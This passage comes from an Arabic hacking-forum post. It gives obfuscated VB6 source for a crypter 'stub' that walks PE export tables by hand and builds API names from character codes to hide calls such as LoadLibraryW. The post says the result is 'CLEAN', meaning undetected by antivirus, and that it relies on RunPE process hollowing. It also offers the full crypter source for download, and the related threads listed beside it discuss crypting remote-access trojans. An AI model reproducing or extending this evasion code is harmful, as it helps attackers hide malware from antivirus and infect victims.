j8anuvmuw38t3gl7owt6273iv2lsshzi4alz2o85we3lt4y7em = Me.je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(Me.y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(sLib), sProc)
End Function
Public Function y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(ByVal sLib As String) As Long
y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji = a95ldcmolh93x6f8nxg56x8zh09v358qkrao5y8kvp5nl12mn4(c_lLoadLib, StrPtr(sLib & vbNullChar))
End Function
Public Property Get Initialized() As Boolean
Initialized = c_bInit
End Property
Public Sub Class_Initialize()
Call PutThunk(THUNK_KERNELBASE)
c_lKrnl = coys1324j9dnit0ck9fqueaipj4pmgkwisso3r9hh12njqpij2
If Not c_lKrnl = 0 Then
c_lLoadLib = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(c_lKrnl, Chr$(76) & Chr$(111) & Chr$(97) & Chr$(100) & Chr$(76) & Chr$(105) & Chr$(98) & Chr$(114) & Chr$(97) & Chr$(114) & Chr$(121) & Chr$(87))
If Not c_lLoadLib = 0 Then
c_bInit = True
End If
End If
End Sub
Public Function je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(ByVal lMod As Long, ByVal sProc As String) As Long
Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY
Call CopyBytes(SIZE_DOS_HEADER, tIMAGE_DOS_HEADER, ByVal lMod)
If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
Exit Function
End If
Call CopyBytes(SIZE_NT_HEADERS, tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew)
If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
Exit Function
End If
Dim lVAddress As Long
Dim lVSize As Long
Dim lBase As Long
With tIMAGE_NT_HEADERS.OptionalHeader
lVAddress = lMod + .DataDirectory(0).VirtualAddress
lVSize = lVAddress + .DataDirectory(0).Size
lBase = .ImageBase
End With
Call CopyBytes(SIZE_EXPORT_DIRECTORY, tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress)
Dim i As Long
Dim lFunctAdd As Long
Dim lNameAdd As Long
Dim lNumbAdd As Long
With tIMAGE_EXPORT_DIRECTORY
For i = 0 To .NumberOfNames - 1
CopyBytes 4, lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4
If a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j(lBase + lNameAdd) = sProc Then
CopyBytes 2, lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2
CopyBytes 4, lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4
je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt = lFunctAdd + lBase
If je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt >= lVAddress And _
je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt <= lVSize Then
Call ww9ooiphmp9scxi8gryge15iu5o7yvis77ub9a1l950s62p9mi(je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt, lMod, sProc)
If Not lMod = 0 Then
je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt = je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt(lMod, sProc)
Else
je0amv1tuv2um7k15xuutj6xz3uchn18wd2qv8l6lauarex3kt = 0
End If
End If
Exit Function
End If
Next
End With
End Function
Private Function ww9ooiphmp9scxi8gryge15iu5o7yvis77ub9a1l950s62p9mi( _
ByVal lAddress As Long, _
ByRef lLib As Long, _
ByRef sMod As String)
Dim sForward As String
sForward = a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j(lAddress)
If InStr(1, sForward, Chr$(46)) Then
lLib = y9btrf3pvz28b4m1iuliy4lp6hkhx2o0plajfvh7ahfc2e0dji(Split(sForward, Chr$(46))(0))
sMod = Split(sForward, Chr$(46))(1)
End If
End Function
Private Function a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j( _
ByVal lAddress As Long) As String
Dim bChar As Byte
Do
CopyBytes 1, bChar, ByVal lAddress
lAddress = lAddress + 1
If bChar = 0 Then Exit Do
a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j = a4x240goslhx0t9hjisdg40lajahv6pu1dkywa9y61wkoibx8j & Chr$(bChar)
Loop
End Function
Private Function v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy(ByVal sData As String) As String
Dim i As Long
For i = 1 To Len(sData) Step 2
v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy = v9i26iiq7hvcq2tuerrwq91etpw4rx5rvgbfqsrro0q3iri5fy & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(sData, i, 2)))
Next i
End Function
Public Function rizc6m31kcdz9qacz67ezxravytv3t8xb13hmf5i79mptq2tjr(ByVal OnvN9MtEry As String) As String
Dim qOHPMMuJzh As String
Dim xE8KVQnQr6 As String
Dim orCPFJ0gUA As Long
For orCPFJ0gUA = 1 To Len(OnvN9MtEry) Step 2
qOHPMMuJzh = Chr$(Val("&H" & Mid$(OnvN9MtEry, orCPFJ0gUA, 2)))
xE8KVQnQr6 = xE8KVQnQr6 & qOHPMMuJzh
Next orCPFJ0gUA
rizc6m31kcdz9qacz67ezxravytv3t8xb13hmf5i79mptq2tjr = xE8KVQnQr6
End Function
يجب تطبيق هذه الخطوات
وبكذا خلصنا برمجـة الستب ..
طبعاً لازم يكون أسم الستب هو
Stub
ويكون موجود بجنب برنامج التشفير
بكذا خلصنا العمل ..
وطبعاً التشفيرة هي CLEAN !
وأعتمت على التشفير بأستخدام RunPE !
والأن مع السورس كود حق برنامج التشفير ألي صممته
للكسولين
أي أستفسار أو أي مشكلـة متواجد هنا لحلها
مؤسسـة الأبداع التقني Dev-PoiNT
المخرج Dr.AdNaN
[size=9](C) جميع الحقوق محفوظـة
لتحميل الأكواد لمن يضهر له خطأ :
http://www.multiupload.com/T7JDYHTRSZ
لتحميل الصور لمن لم تضهر له :
http://www.multiupload.com/2TLZ5NQSIR
mantop- عضو جديد
- عدد المساهمات : 25
نقاط : 69
السٌّمعَة : 0
تاريخ التسجيل : 28/09/2010
العمل/الترفيه : الهكر
مواضيع مماثلة
» افتراضي TsT Family Crypter almost Clean برنامج تشفير Bifrost-poison
» الدرس الأول : برمجة برنامج تشفير { ScanTime } + { إبتداء دورة برمجة التشفير }
» ثغرات المتصفح .. والحصول على أحدثها .. والتشفير ~
» اسهل شرح علي مستوي النت في تشفير قيمة Dropper.Gen...
» دورة احتراف التشفير + تشفير اي باتش جميع الشروحات حصرية (:
» الدرس الأول : برمجة برنامج تشفير { ScanTime } + { إبتداء دورة برمجة التشفير }
» ثغرات المتصفح .. والحصول على أحدثها .. والتشفير ~
» اسهل شرح علي مستوي النت في تشفير قيمة Dropper.Gen...
» دورة احتراف التشفير + تشفير اي باتش جميع الشروحات حصرية (:
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى